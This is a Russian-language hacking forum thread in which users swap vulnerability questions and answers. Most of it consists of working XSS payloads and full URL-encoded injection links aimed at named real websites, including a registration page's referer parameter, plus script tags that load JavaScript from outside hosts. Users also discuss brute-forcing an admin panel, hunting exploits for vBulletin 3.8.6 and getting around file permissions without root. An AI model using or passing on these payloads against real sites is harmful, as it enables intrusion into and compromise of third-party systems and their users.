Ваши вопросы по уязвимостям.

Проще будет отредактировать максимальное количество вводимых символов в исходном коде.
Да,и js не запустится через сократитель ссылок

 

Подключите удаленный скрипт <script src="http://youhost.com/script.js">

 

На сервере все папки и файлы созданы из под одного юзера/группы, но в одни папки есть возможность записи, в другие нет (права одинаковые). У тех куда нет доступа, права не меняются с помощью chmod. Но рядом есть точно такие же папки, с тем же пользователем/правами и туда отлично добавляются файлы, меняются права и т.д Как админ так хитро ограничил доступ?

 

Ничего хитрого, просто правильно расставлены ограничения.

 

И каким же образом? Реально обойти без получения рута?

 

на всякий случай можно без кавычек и без http. <script src=//lol.ru/1.js></script>

 

Спасибо что ответил,но теперь вопрос другой,как обойти "это" . Ведь я не знаю логин и пароль модёра или админа . Что делать ? .

 

Привет всем,можно ли создать скрипт самоудаляющейся чтобы и теги его тоже удалялись?

 

можно

 

Странная ситуация, вставляю xss, и она не выполняется. Вот вывод:

Code:

<input type="hidden" id="refererNickname" name="refererNickname" value=""><script type="text/javascript">alert(/olololkin2/);</script><input type="text" value="1"/>

Открываю "Просмотр исходного кода страницы", копирую весь код себе в файл, открываю его со своего домена - там xss срабатывает. Все манипуляции в Firefox

Code:

(Request-Line) GET /registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%2Folololkin2%2F)%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221 HTTP/1.1

User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

В первый раз такое. Адрес:

Code:

http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert%28%2Folololkin2%2F%29%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221

 

я пока сам не понял в чем дело, однако prompt() срабатывает:

Code:

http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Csvg/onload=prompt%28/antichat/%29%3E

 

Xss есть, почитай js файлы, prompt работает
http://100ads.net/registration/?a=0&refererNickname="><script>prompt()</script>

 

А ты думал достаточно просто найти админку?)
Можешь теперь поставить её на брут,но шансов подобрать логин/пароль практически нет.
Ищи уязвимости,пробей какая версия движка там стоит,поищи сплоиты и тд.

 

Подскажи пжл как такой скрипт составить.

 

vBulletin 3.8.6 . Сплоиты не могу найти и юзать я их тоже не умею .

 

http://mobile.dmtc.com/index.php?video/replays/2010-08/08/8'
Можно что нибудь сделать?

 

нет

 

Действительно срабатывает.

Можно.

XSS уязвимость.
$url = "http://mobile.dmtc.com/index.php?video/replays/2010-08/08/8\'";
$referer = "\"><script>alert(/antichat/);</script>";

 

И все-таки алерт тоже работает, но вот почему он не вызывается, хотя по всему должен , как записано у ocheretko я х.з. реврайтов каких то не увидел...

Code:

http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cimg%20src=%271.jpg%27%20onerror=alert%28/1/%29%3E

 

Помогите раскрутить, впервые сталкиваюсь, когда вывод не через кавычку

Code:

http://navi-gaming.com/en/achievements?id[]=71

Code:

http://www.team-empire.org/materials/reports/?/materials/reports/=&page=\